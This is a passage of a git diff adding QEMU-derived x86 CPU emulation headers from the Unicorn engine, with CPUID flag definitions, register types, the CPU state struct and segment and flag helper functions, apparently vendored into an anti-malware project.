CPUID_EXT_F16C (1U << 29) +#define CPUID_EXT_RDRAND (1U << 30) +#define CPUID_EXT_HYPERVISOR (1U << 31) + +#define CPUID_EXT2_FPU (1U << 0) +#define CPUID_EXT2_VME (1U << 1) +#define CPUID_EXT2_DE (1U << 2) +#define CPUID_EXT2_PSE (1U << 3) +#define CPUID_EXT2_TSC (1U << 4) +#define CPUID_EXT2_MSR (1U << 5) +#define CPUID_EXT2_PAE (1U << 6) +#define CPUID_EXT2_MCE (1U << 7) +#define CPUID_EXT2_CX8 (1U << 8) +#define CPUID_EXT2_APIC (1U << 9) +#define CPUID_EXT2_SYSCALL (1U << 11) +#define CPUID_EXT2_MTRR (1U << 12) +#define CPUID_EXT2_PGE (1U << 13) +#define CPUID_EXT2_MCA (1U << 14) +#define CPUID_EXT2_CMOV (1U << 15) +#define CPUID_EXT2_PAT (1U << 16) +#define CPUID_EXT2_PSE36 (1U << 17) +#define CPUID_EXT2_MP (1U << 19) +#define CPUID_EXT2_NX (1U << 20) +#define CPUID_EXT2_MMXEXT (1U << 22) +#define CPUID_EXT2_MMX (1U << 23) +#define CPUID_EXT2_FXSR (1U << 24) +#define CPUID_EXT2_FFXSR (1U << 25) +#define CPUID_EXT2_PDPE1GB (1U << 26) +#define CPUID_EXT2_RDTSCP (1U << 27) +#define CPUID_EXT2_LM (1U << 29) +#define CPUID_EXT2_3DNOWEXT (1U << 30) +#define CPUID_EXT2_3DNOW (1U << 31) + +/* CPUID[8000_0001].EDX bits that are aliase of CPUID[1].EDX bits on AMD CPUs */ +#define CPUID_EXT2_AMD_ALIASES (CPUID_EXT2_FPU | CPUID_EXT2_VME | \ + CPUID_EXT2_DE | CPUID_EXT2_PSE | \ + CPUID_EXT2_TSC | CPUID_EXT2_MSR | \ + CPUID_EXT2_PAE | CPUID_EXT2_MCE | \ + CPUID_EXT2_CX8 | CPUID_EXT2_APIC | \ + CPUID_EXT2_MTRR | CPUID_EXT2_PGE | \ + CPUID_EXT2_MCA | CPUID_EXT2_CMOV | \ + CPUID_EXT2_PAT | CPUID_EXT2_PSE36 | \ + CPUID_EXT2_MMX | CPUID_EXT2_FXSR) + +#define CPUID_EXT3_LAHF_LM (1U << 0) +#define CPUID_EXT3_CMP_LEG (1U << 1) +#define CPUID_EXT3_SVM (1U << 2) +#define CPUID_EXT3_EXTAPIC (1U << 3) +#define CPUID_EXT3_CR8LEG (1U << 4) +#define CPUID_EXT3_ABM (1U << 5) +#define CPUID_EXT3_SSE4A (1U << 6) +#define CPUID_EXT3_MISALIGNSSE (1U << 7) +#define CPUID_EXT3_3DNOWPREFETCH (1U << 8) +#define CPUID_EXT3_OSVW (1U << 9) +#define CPUID_EXT3_IBS (1U << 10) +#define CPUID_EXT3_XOP (1U << 11) +#define CPUID_EXT3_SKINIT (1U << 12) +#define CPUID_EXT3_WDT (1U << 13) +#define CPUID_EXT3_LWP (1U << 15) +#define CPUID_EXT3_FMA4 (1U << 16) +#define CPUID_EXT3_TCE (1U << 17) +#define CPUID_EXT3_NODEID (1U << 19) +#define CPUID_EXT3_TBM (1U << 21) +#define CPUID_EXT3_TOPOEXT (1U << 22) +#define CPUID_EXT3_PERFCORE (1U << 23) +#define CPUID_EXT3_PERFNB (1U << 24) + +#define CPUID_SVM_NPT (1U << 0) +#define CPUID_SVM_LBRV (1U << 1) +#define CPUID_SVM_SVMLOCK (1U << 2) +#define CPUID_SVM_NRIPSAVE (1U << 3) +#define CPUID_SVM_TSCSCALE (1U << 4) +#define CPUID_SVM_VMCBCLEAN (1U << 5) +#define CPUID_SVM_FLUSHASID (1U << 6) +#define CPUID_SVM_DECODEASSIST (1U << 7) +#define CPUID_SVM_PAUSEFILTER (1U << 10) +#define CPUID_SVM_PFTHRESHOLD (1U << 12) + +#define CPUID_7_0_EBX_FSGSBASE (1U << 0) +#define CPUID_7_0_EBX_BMI1 (1U << 3) +#define CPUID_7_0_EBX_HLE (1U << 4) +#define CPUID_7_0_EBX_AVX2 (1U << 5) +#define CPUID_7_0_EBX_SMEP (1U << 7) +#define CPUID_7_0_EBX_BMI2 (1U << 8) +#define CPUID_7_0_EBX_ERMS (1U << 9) +#define CPUID_7_0_EBX_INVPCID (1U << 10) +#define CPUID_7_0_EBX_RTM (1U << 11) +#define CPUID_7_0_EBX_MPX (1U << 14) +#define CPUID_7_0_EBX_AVX512F (1U << 16) /* AVX-512 Foundation */ +#define CPUID_7_0_EBX_RDSEED (1U << 18) +#define CPUID_7_0_EBX_ADX (1U << 19) +#define CPUID_7_0_EBX_SMAP (1U << 20) +#define CPUID_7_0_EBX_AVX512PF (1U << 26) /* AVX-512 Prefetch */ +#define CPUID_7_0_EBX_AVX512ER (1U << 27) /* AVX-512 Exponential and Reciprocal */ +#define CPUID_7_0_EBX_AVX512CD (1U << 28) /* AVX-512 Conflict Detection */ + +/* CPUID[0x80000007].EDX flags: */ +#define CPUID_APM_INVTSC (1U << 8) + +#define CPUID_VENDOR_SZ 12 + +#define CPUID_VENDOR_INTEL_1 0x756e6547 /* "Genu" */ +#define CPUID_VENDOR_INTEL_2 0x49656e69 /* "ineI" */ +#define CPUID_VENDOR_INTEL_3 0x6c65746e /* "ntel" */ +#define CPUID_VENDOR_INTEL "GenuineIntel" + +#define CPUID_VENDOR_AMD_1 0x68747541 /* "Auth" */ +#define CPUID_VENDOR_AMD_2 0x69746e65 /* "enti" */ +#define CPUID_VENDOR_AMD_3 0x444d4163 /* "cAMD" */ +#define CPUID_VENDOR_AMD "AuthenticAMD" + +#define CPUID_VENDOR_VIA "CentaurHauls" + +#define CPUID_MWAIT_IBE (1U << 1) /* Interrupts can exit capability */ +#define CPUID_MWAIT_EMX (1U << 0) /* enumeration supported */ + +#ifndef HYPERV_SPINLOCK_NEVER_RETRY +#define HYPERV_SPINLOCK_NEVER_RETRY 0xFFFFFFFF +#endif + +#define EXCP00_DIVZ 0 +#define EXCP01_DB 1 +#define EXCP02_NMI 2 +#define EXCP03_INT3 3 +#define EXCP04_INTO 4 +#define EXCP05_BOUND 5 +#define EXCP06_ILLOP 6 +#define EXCP07_PREX 7 +#define EXCP08_DBLE 8 +#define EXCP09_XERR 9 +#define EXCP0A_TSS 10 +#define EXCP0B_NOSEG 11 +#define EXCP0C_STACK 12 +#define EXCP0D_GPF 13 +#define EXCP0E_PAGE 14 +#define EXCP10_COPR 16 +#define EXCP11_ALGN 17 +#define EXCP12_MCHK 18 + +#define EXCP_SYSCALL 0x100 /* only happens in user only emulation + for syscall instruction */ + +/* i386-specific interrupt pending bits. */ +#define CPU_INTERRUPT_POLL CPU_INTERRUPT_TGT_EXT_1 +#define CPU_INTERRUPT_SMI CPU_INTERRUPT_TGT_EXT_2 +#define CPU_INTERRUPT_NMI CPU_INTERRUPT_TGT_EXT_3 +#define CPU_INTERRUPT_MCE CPU_INTERRUPT_TGT_EXT_4 +#define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_INT_0 +#define CPU_INTERRUPT_SIPI CPU_INTERRUPT_TGT_INT_1 +#define CPU_INTERRUPT_TPR CPU_INTERRUPT_TGT_INT_2 + +/* Use a clearer name for this. */ +#define CPU_INTERRUPT_INIT CPU_INTERRUPT_RESET + +typedef enum { + CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ + CC_OP_EFLAGS, /* all cc are explicitly computed, CC_SRC = flags */ + + CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */ + CC_OP_MULW, + CC_OP_MULL, + CC_OP_MULQ, + + CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_ADDW, + CC_OP_ADDL, + CC_OP_ADDQ, + + CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_ADCW, + CC_OP_ADCL, + CC_OP_ADCQ, + + CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_SUBW, + CC_OP_SUBL, + CC_OP_SUBQ, + + CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_SBBW, + CC_OP_SBBL, + CC_OP_SBBQ, + + CC_OP_LOGICB, /* modify all flags, CC_DST = res */ + CC_OP_LOGICW, + CC_OP_LOGICL, + CC_OP_LOGICQ, + + CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + CC_OP_INCW, + CC_OP_INCL, + CC_OP_INCQ, + + CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + CC_OP_DECW, + CC_OP_DECL, + CC_OP_DECQ, + + CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */ + CC_OP_SHLW, + CC_OP_SHLL, + CC_OP_SHLQ, + + CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */ + CC_OP_SARW, + CC_OP_SARL, + CC_OP_SARQ, + + CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */ + CC_OP_BMILGW, + CC_OP_BMILGL, + CC_OP_BMILGQ, + + CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest. */ + CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest. */ + CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest. */ + + CC_OP_CLR, /* Z set, all other flags clear. */ + + CC_OP_NB, +} CCOp; + +typedef struct SegmentCache { + uint32_t selector; + target_ulong base; + uint32_t limit; + uint32_t flags; +} SegmentCache; + +typedef union { + uint8_t _b[16]; + uint16_t _w[8]; + uint32_t _l[4]; + uint64_t _q[2]; + float32 _s[4]; + float64 _d[2]; +} XMMReg; + +typedef union { + uint8_t _b[32]; + uint16_t _w[16]; + uint32_t _l[8]; + uint64_t _q[4]; + float32 _s[8]; + float64 _d[4]; +} YMMReg; + +typedef union { + uint8_t _b[64]; + uint16_t _w[32]; + uint32_t _l[16]; + uint64_t _q[8]; + float32 _s[16]; + float64 _d[8]; +} ZMMReg; + +typedef union { + uint8_t _b[8]; + uint16_t _w[4]; + uint32_t _l[2]; + float32 _s[2]; + uint64_t q; +} MMXReg; + +typedef struct BNDReg { + uint64_t lb; + uint64_t ub; +} BNDReg; + +typedef struct BNDCSReg { + uint64_t cfgu; + uint64_t sts; +} BNDCSReg; + +#ifdef HOST_WORDS_BIGENDIAN +#define ZMM_B(n) _b[63 - (n)] +#define ZMM_W(n) _w[31 - (n)] +#define ZMM_L(n) _l[15 - (n)] +#define ZMM_S(n) _s[15 - (n)] +#define ZMM_Q(n) _q[7 - (n)] +#define ZMM_D(n) _d[7 - (n)] + +#define YMM_B(n) _b[31 - (n)] +#define YMM_W(n) _w[15 - (n)] +#define YMM_L(n) _l[7 - (n)] +#define YMM_S(n) _s[7 - (n)] +#define YMM_Q(n) _q[3 - (n)] +#define YMM_D(n) _d[3 - (n)] + +#define XMM_B(n) _b[15 - (n)] +#define XMM_W(n) _w[7 - (n)] +#define XMM_L(n) _l[3 - (n)] +#define XMM_S(n) _s[3 - (n)] +#define XMM_Q(n) _q[1 - (n)] +#define XMM_D(n) _d[1 - (n)] + +#define MMX_B(n) _b[7 - (n)] +#define MMX_W(n) _w[3 - (n)] +#define MMX_L(n) _l[1 - (n)] +#define MMX_S(n) _s[1 - (n)] +#else +#define ZMM_B(n) _b[n] +#define ZMM_W(n) _w[n] +#define ZMM_L(n) _l[n] +#define ZMM_S(n) _s[n] +#define ZMM_Q(n) _q[n] +#define ZMM_D(n) _d[n] + +#define YMM_B(n) _b[n] +#define YMM_W(n) _w[n] +#define YMM_L(n) _l[n] +#define YMM_S(n) _s[n] +#define YMM_Q(n) _q[n] +#define YMM_D(n) _d[n] + +#define XMM_B(n) _b[n] +#define XMM_W(n) _w[n] +#define XMM_L(n) _l[n] +#define XMM_S(n) _s[n] +#define XMM_Q(n) _q[n] +#define XMM_D(n) _d[n] + +#define MMX_B(n) _b[n] +#define MMX_W(n) _w[n] +#define MMX_L(n) _l[n] +#define MMX_S(n) _s[n] +#endif +#define MMX_Q(n) q + +typedef union { + floatx80 QEMU_ALIGN(16, d); + MMXReg mmx; +} FPReg; + +typedef struct { + uint64_t base; + uint64_t mask; +} MTRRVar; + +#define CPU_NB_REGS64 16 +#define CPU_NB_REGS32 8 + +#ifdef TARGET_X86_64 +#define CPU_NB_REGS CPU_NB_REGS64 +#else +#define CPU_NB_REGS CPU_NB_REGS32 +#endif + +#define MAX_FIXED_COUNTERS 3 +#define MAX_GP_COUNTERS (MSR_IA32_PERF_STATUS - MSR_P6_EVNTSEL0) + +#define NB_MMU_MODES 3 + +#define NB_OPMASK_REGS 8 + +typedef enum TPRAccess { + TPR_ACCESS_READ, + TPR_ACCESS_WRITE, +} TPRAccess; + +typedef struct CPUX86State { + /* standard registers */ + target_ulong regs[CPU_NB_REGS]; + target_ulong eip; + target_ulong eflags0; // copy of eflags that does not change thru the BB + target_ulong eflags; /* eflags register. During CPU emulation, CC + flags and DF are set to zero because they are + stored elsewhere */ + + /* emulator internal eflags handling */ + target_ulong cc_dst; + target_ulong cc_src; + target_ulong cc_src2; + uint32_t cc_op; + int32_t df; /* D flag : 1 if D = 0, -1 if D = 1 */ + uint32_t hflags; /* TB flags, see HF_xxx constants. These flags + are known at translation time. */ + uint32_t hflags2; /* various other flags, see HF2_xxx constants. */ + + /* segments */ + SegmentCache segs[6]; /* selector values */ + SegmentCache ldt; + SegmentCache tr; + SegmentCache gdt; /* only base and limit are used */ + SegmentCache idt; /* only base and limit are used */ + + target_ulong cr[5]; /* NOTE: cr1 is unused */ + int32_t a20_mask; + + BNDReg bnd_regs[4]; + BNDCSReg bndcs_regs; + uint64_t msr_bndcfgs; + + /* Beginning of state preserved by INIT (dummy marker). */ + //struct {} start_init_save; + int start_init_save; + + /* FPU state */ + unsigned int fpstt; /* top of stack index */ + uint16_t fpus; + uint16_t fpuc; + uint8_t fptags[8]; /* 0 = valid, 1 = empty */ + FPReg fpregs[8]; + /* KVM-only so far */ + uint16_t fpop; + uint64_t fpip; + uint64_t fpdp; + + /* emulator internal variables */ + float_status fp_status; + floatx80 ft0; + + float_status mmx_status; /* for 3DNow! float ops */ + float_status sse_status; + uint32_t mxcsr; + XMMReg xmm_regs[CPU_NB_REGS]; + XMMReg xmm_t0; + MMXReg mmx_t0; + + XMMReg ymmh_regs[CPU_NB_REGS]; + + uint64_t opmask_regs[NB_OPMASK_REGS]; + YMMReg zmmh_regs[CPU_NB_REGS]; +#ifdef TARGET_X86_64 + ZMMReg hi16_zmm_regs[CPU_NB_REGS]; +#endif + + /* sysenter registers */ + uint32_t sysenter_cs; + target_ulong sysenter_esp; + target_ulong sysenter_eip; + uint64_t efer; + uint64_t star; + + uint64_t vm_hsave; + +#ifdef TARGET_X86_64 + target_ulong lstar; + target_ulong cstar; + target_ulong fmask; + target_ulong kernelgsbase; +#endif + + uint64_t tsc; + uint64_t tsc_adjust; + uint64_t tsc_deadline; + + uint64_t mcg_status; + uint64_t msr_ia32_misc_enable; + uint64_t msr_ia32_feature_control; + + uint64_t msr_fixed_ctr_ctrl; + uint64_t msr_global_ctrl; + uint64_t msr_global_status; + uint64_t msr_global_ovf_ctrl; + uint64_t msr_fixed_counters[MAX_FIXED_COUNTERS]; + uint64_t msr_gp_counters[MAX_GP_COUNTERS]; + uint64_t msr_gp_evtsel[MAX_GP_COUNTERS]; + + uint64_t pat; + uint32_t smbase; + + /* End of state preserved by INIT (dummy marker). */ + //struct {} end_init_save; + int end_init_save; + + uint64_t system_time_msr; + uint64_t wall_clock_msr; + uint64_t steal_time_msr; + uint64_t async_pf_en_msr; + uint64_t pv_eoi_en_msr; + + uint64_t msr_hv_hypercall; + uint64_t msr_hv_guest_os_id; + uint64_t msr_hv_vapic; + uint64_t msr_hv_tsc; + + /* exception/interrupt handling */ + int error_code; + int exception_is_int; + target_ulong exception_next_eip; + target_ulong dr[8]; /* debug registers */ + union { + struct CPUBreakpoint *cpu_breakpoint[4]; + struct CPUWatchpoint *cpu_watchpoint[4]; + }; /* break/watchpoints for dr[0..3] */ + int old_exception; /* exception in flight */ + + uint64_t vm_vmcb; + uint64_t tsc_offset; + uint64_t intercept; + uint16_t intercept_cr_read; + uint16_t intercept_cr_write; + uint16_t intercept_dr_read; + uint16_t intercept_dr_write; + uint32_t intercept_exceptions; + uint8_t v_tpr; + + /* KVM states, automatically cleared on reset */ + uint8_t nmi_injected; + uint8_t nmi_pending; + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. */ + + /* processor features (e.g. for CPUID insn) */ + uint32_t cpuid_level; + uint32_t cpuid_xlevel; + uint32_t cpuid_xlevel2; + uint32_t cpuid_vendor1; + uint32_t cpuid_vendor2; + uint32_t cpuid_vendor3; + uint32_t cpuid_version; + FeatureWordArray features; + uint32_t cpuid_model[12]; + uint32_t cpuid_apic_id; + + /* MTRRs */ + uint64_t mtrr_fixed[11]; + uint64_t mtrr_deftype; + MTRRVar mtrr_var[MSR_MTRRcap_VCNT]; + + /* For KVM */ + uint32_t mp_state; + int32_t exception_injected; + int32_t interrupt_injected; + uint8_t soft_interrupt; + uint8_t has_error_code; + uint32_t sipi_vector; + bool tsc_valid; + int tsc_khz; + void *kvm_xsave_buf; + + uint64_t mcg_cap; + uint64_t mcg_ctl; + uint64_t mce_banks[MCE_BANKS_DEF*4]; + + uint64_t tsc_aux; + + /* vmstate */ + uint16_t fpus_vmstate; + uint16_t fptag_vmstate; + uint16_t fpregs_format_vmstate; + uint64_t xstate_bv; + + uint64_t xcr0; + + TPRAccess tpr_access_type; + + // Unicorn engine + struct uc_struct *uc; +} CPUX86State; + +#include "cpu-qom.h" + +X86CPU *cpu_x86_init(struct uc_struct *uc, const char *cpu_model); +X86CPU *cpu_x86_create(struct uc_struct *uc, const char *cpu_model, Error **errp); +int cpu_x86_exec(struct uc_struct *uc, CPUX86State *s); +void x86_cpudef_setup(void); +int cpu_x86_support_mca_broadcast(CPUX86State *env); + +int cpu_get_pic_interrupt(CPUX86State *s); +/* MSDOS compatibility mode FPU exception support */ +void cpu_set_ferr(CPUX86State *s); + +/* this function must always be used to load data in the segment + cache: it synchronizes the hflags with the segment cache values */ +static inline void cpu_x86_load_seg_cache(CPUX86State *env, + int seg_reg, unsigned int selector, + target_ulong base, + unsigned int limit, + unsigned int flags) +{ + SegmentCache *sc; + unsigned int new_hflags; + + sc = &env->segs[seg_reg]; + sc->selector = selector; + sc->base = base; + sc->limit = limit; + sc->flags = flags; + + /* update the hidden flags */ + { + if (seg_reg == R_CS) { +#ifdef TARGET_X86_64 + if ((env->hflags & HF_LMA_MASK) && (flags & DESC_L_MASK)) { + /* long mode */ + env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK; + env->hflags &= ~(HF_ADDSEG_MASK); + } else +#endif + { + /* legacy / compatibility case */ + new_hflags = (env->segs[R_CS].flags & DESC_B_MASK) + >> (DESC_B_SHIFT - HF_CS32_SHIFT); + env->hflags = (env->hflags & ~(HF_CS32_MASK | HF_CS64_MASK)) | + new_hflags; + } + } + if (seg_reg == R_SS) { + int cpl = (flags >> DESC_DPL_SHIFT) & 3; +#if HF_CPL_MASK != 3 +#error HF_CPL_MASK is hardcoded +#endif + env->hflags = (env->hflags & ~HF_CPL_MASK) | cpl; + } + new_hflags = (env->segs[R_SS].flags & DESC_B_MASK) + >> (DESC_B_SHIFT - HF_SS32_SHIFT); + if (env->hflags & HF_CS64_MASK) { + /* zero base assumed for DS, ES and SS in long mode */ + } else if (!(env->cr[0] & CR0_PE_MASK) || + (env->eflags & VM_MASK) || + !(env->hflags & HF_CS32_MASK)) { + /* XXX: try to avoid this test. The problem comes from the + fact that is real mode or vm86 mode we only modify the + 'base' and 'selector' fields of the segment cache to go + faster. A solution may be to force addseg to one in + translate-i386.c. */ + new_hflags |= HF_ADDSEG_MASK; + } else { + new_hflags |= ((env->segs[R_DS].base | + env->segs[R_ES].base | + env->segs[R_SS].base) != 0) << + HF_ADDSEG_SHIFT; + } + env->hflags = (env->hflags & + ~(HF_SS32_MASK | HF_ADDSEG_MASK)) | new_hflags; + } +} + +static inline void cpu_x86_load_seg_cache_sipi(X86CPU *cpu, + uint8_t sipi_vector) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + + env->eip = 0; + cpu_x86_load_seg_cache(env, R_CS, sipi_vector << 8, + sipi_vector << 12, + env->segs[R_CS].limit, + env->segs[R_CS].flags); + cs->halted = 0; +} + +int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, + target_ulong *base, unsigned int *limit, + unsigned int *flags); + +/* op_helper.c */ +/* used for debug or cpu save/restore */ +void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f); +floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper); + +/* cpu-exec.c */ +/* the following helpers are only usable in user mode simulation as + they can trigger unexpected exceptions */ +void cpu_x86_load_seg(CPUX86State *s, int seg_reg, int selector); +void cpu_x86_fsave(CPUX86State *s, target_ulong ptr, int data32); +void cpu_x86_frstor(CPUX86State *s, target_ulong ptr, int data32); + +/* the binding language can not catch the exceptions. + check the arguments, return error instead of raise exceptions. */ +int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel); + +/* you can call this signal handler from your SIGBUS and SIGSEGV + signal handlers to inform the virtual CPU of exceptions. non zero + is returned if the signal was handled by the virtual CPU. */ +int cpu_x86_signal_handler(int host_signum, void *pinfo, + void *puc); + +/* cpuid.c */ +void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, + uint32_t *eax, uint32_t *ebx, + uint32_t *ecx, uint32_t *edx); +void cpu_clear_apic_feature(CPUX86State *env); +void host_cpuid(uint32_t function, uint32_t count, + uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx); + +/* helper.c */ +int x86_cpu_handle_mmu_fault(CPUState *cpu, vaddr addr, + int is_write, int mmu_idx); +void x86_cpu_set_a20(X86CPU *cpu, int a20_state); + +static inline bool hw_local_breakpoint_enabled(unsigned long dr7, int index) +{ + return (dr7 >> (index * 2)) & 1; +} + +static inline bool hw_global_breakpoint_enabled(unsigned long dr7, int index) +{ + return (dr7 >> (index * 2)) & 2; + +} +static inline bool hw_breakpoint_enabled(unsigned long dr7, int index) +{ + return hw_global_breakpoint_enabled(dr7, index) || + hw_local_breakpoint_enabled(dr7, index); +} + +static inline int hw_breakpoint_type(unsigned long dr7, int index) +{ + return (dr7 >> (DR7_TYPE_SHIFT + (index * 4))) & 3; +} + +static inline int hw_breakpoint_len(unsigned long dr7, int index) +{ + int len = ((dr7 >> (DR7_LEN_SHIFT + (index * 4))) & 3); + return (len == 2) ? 8 : len + 1; +} + +void hw_breakpoint_insert(CPUX86State *env, int index); +void hw_breakpoint_remove(CPUX86State *env, int index); +bool check_hw_breakpoints(CPUX86State *env, bool force_dr6_update); +void breakpoint_handler(CPUState *cs); + +/* will be suppressed */ +void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0); +void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3); +void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4); + +/* hw/pc.c */ +void cpu_smm_update(CPUX86State *env); +uint64_t cpu_get_tsc(CPUX86State *env); + +#define TARGET_PAGE_BITS 12 + +#ifdef TARGET_X86_64 +#define TARGET_PHYS_ADDR_SPACE_BITS 52 +/* ??? This is really 48 bits, sign-extended, but the only thing + accessible to userland with bit 48 set is the VSYSCALL, and that + is handled via other mechanisms. */ +#define TARGET_VIRT_ADDR_SPACE_BITS 47 +#else +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 +#endif + +/* XXX: This value should match the one returned by CPUID + * and in exec.c */ +# if defined(TARGET_X86_64) +# define PHYS_ADDR_MASK 0xffffffffffLL +# else +# define PHYS_ADDR_MASK 0xfffffffffLL +# endif + +static inline CPUX86State *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + X86CPU *cpu = cpu_x86_init(uc, cpu_model); + if (cpu == NULL) { + return NULL; + } + return &cpu->env; +} + +#ifdef TARGET_I386 +#define cpu_exec cpu_x86_exec +#define cpu_gen_code cpu_x86_gen_code +#define cpu_signal_handler cpu_x86_signal_handler +#define cpudef_setup x86_cpudef_setup +#endif + +/* MMU modes definitions */ +#define MMU_MODE0_SUFFIX _ksmap +#define MMU_MODE1_SUFFIX _user +#define MMU_MODE2_SUFFIX _knosmap /* SMAP disabled or CPL<3 && AC=1 */ +#define MMU_KSMAP_IDX 0 +#define MMU_USER_IDX 1 +#define MMU_KNOSMAP_IDX 2 +static inline int cpu_mmu_index(CPUX86State *env) +{ + return (env->hflags & HF_CPL_MASK) == 3 ? MMU_USER_IDX : + (!(env->hflags & HF_SMAP_MASK) || (env->eflags & AC_MASK)) + ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; +} + +static inline int cpu_mmu_index_kernel(CPUX86State *env) +{ + return !(env->hflags & HF_SMAP_MASK) ? MMU_KNOSMAP_IDX : + ((env->hflags & HF_CPL_MASK) < 3 && (env->eflags & AC_MASK)) + ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; +} + +#define CC_DST (env->cc_dst) +#define CC_SRC (env->cc_src) +#define CC_SRC2 (env->cc_src2) +#define CC_OP (env->cc_op) + +/* n must be a constant to be efficient */ +static inline target_long lshift(target_long x, int n) +{ + if (n >= 0) { + return x << n; + } else { + return x >> (-n); + } +} + +/* float macros */ +#define FT0 (env->ft0) +#define ST0 (env->fpregs[env->fpstt].d) +#define ST(n) (env->fpregs[(env->fpstt + (n)) & 7].d) +#define ST1 ST(1) + +/* translate.c */ +void optimize_flags_init(struct uc_struct *); + +#include "exec/cpu-all.h" +#include "svm.h" + +#if !defined(CONFIG_USER_ONLY) +#include "hw/i386/apic.h" +#endif + +#include "exec/exec-all.h" + +static inline void cpu_get_tb_cpu_state(CPUX86State *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *cs_base = env->segs[R_CS].base; + *pc = *cs_base + env->eip; + *flags = env->hflags | + (env->eflags & (IOPL_MASK | TF_MASK | RF_MASK | VM_MASK | AC_MASK)); +} + +void do_cpu_init(X86CPU *cpu); +void do_cpu_sipi(X86CPU *cpu); + +#define MCE_INJECT_BROADCAST 1 +#define MCE_INJECT_UNCOND_AO 2 + +/* excp_helper.c */ +void QEMU_NORETURN raise_exception(CPUX86State *env, int exception_index); +void QEMU_NORETURN raise_exception_err(CPUX86State *env, int exception_index, + int error_code); +void QEMU_NORETURN raise_interrupt(CPUX86State *nenv, int intno, int is_int, + int error_code, int next_eip_addend); + +/* cc_helper.c */ +extern const uint8_t parity_table[256]; +uint32_t cpu_cc_compute_all(CPUX86State *env1, int op); +void update_fp_status(CPUX86State *env); + +static inline uint32_t cpu_compute_eflags(CPUX86State *env) +{ + return (env->eflags & ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)) | cpu_cc_compute_all(env, CC_OP) | (env->df & DF_MASK); +} + +/* NOTE: the translator must set DisasContext.cc_op to CC_OP_EFLAGS + * after generating a call to a helper that uses this. + */ +static inline void cpu_load_eflags(CPUX86State *env, int eflags, + int update_mask) +{ + CC_SRC = eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); + CC_OP = CC_OP_EFLAGS; + env->df = 1 - (2 * ((eflags >> 10) & 1)); + env->eflags = (env->eflags & ~update_mask) | + (eflags & update_mask) | 0x2; +} + +/* load efer and update the corresponding hflags. XXX: do consistency + checks with cpuid bits? */ +static inline void cpu_load_efer(CPUX86State *env, uint64_t val) +{ + env->efer = val; + env->hflags &= ~(HF_LMA_MASK | HF_SVME_MASK); + if (env->efer & MSR_EFER_LMA) { + env->hflags |= HF_LMA_MASK; + } + if (env->efer & MSR_EFER_SVME) { + env->hflags |= HF_SVME_MASK; + } +} + +/* fpu_helper.c */ +void cpu_set_mxcsr(CPUX86State *env, uint32_t val); +void cpu_set_fpuc(CPUX86State *env, uint16_t val); + +/* svm_helper.c */ +void cpu_svm_check_intercept_param(CPUX86State *env1, uint32_t type, + uint64_t param); +void cpu_vmexit(CPUX86State *nenv, uint32_t exit_code, uint64_t exit_info_1); + +/* seg_helper.c */ +void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw); + +void do_smm_enter(X86CPU *cpu); + +void cpu_report_tpr_access(CPUX86State *env, TPRAccess access); + +void x86_cpu_compat_set_features(const char *cpu_model, FeatureWord w, + uint32_t feat_add, uint32_t feat_remove); + +void x86_cpu_compat_kvm_no_autoenable(FeatureWord w, uint32_t features); +void x86_cpu_compat_kvm_no_autodisable(FeatureWord w, uint32_t features); + + +/* Return name of 32-bit register, from a R_* constant */ +const char *get_register_name_32(unsigned int reg); + +uint32_t x86_cpu_apic_id_from_index(unsigned int cpu_index); +void enable_compat_apic_id_mode(void); + +#define APIC_DEFAULT_ADDRESS 0xfee00000 +#define APIC_SPACE_SIZE 0x100000 + +#endif /* CPU_I386_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/excp_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/excp_helper.c new file mode 100644 index 0000000..7aea373 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/excp_helper.c @@ -0,0 +1,133 @@ +/* + * x86 exception helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public 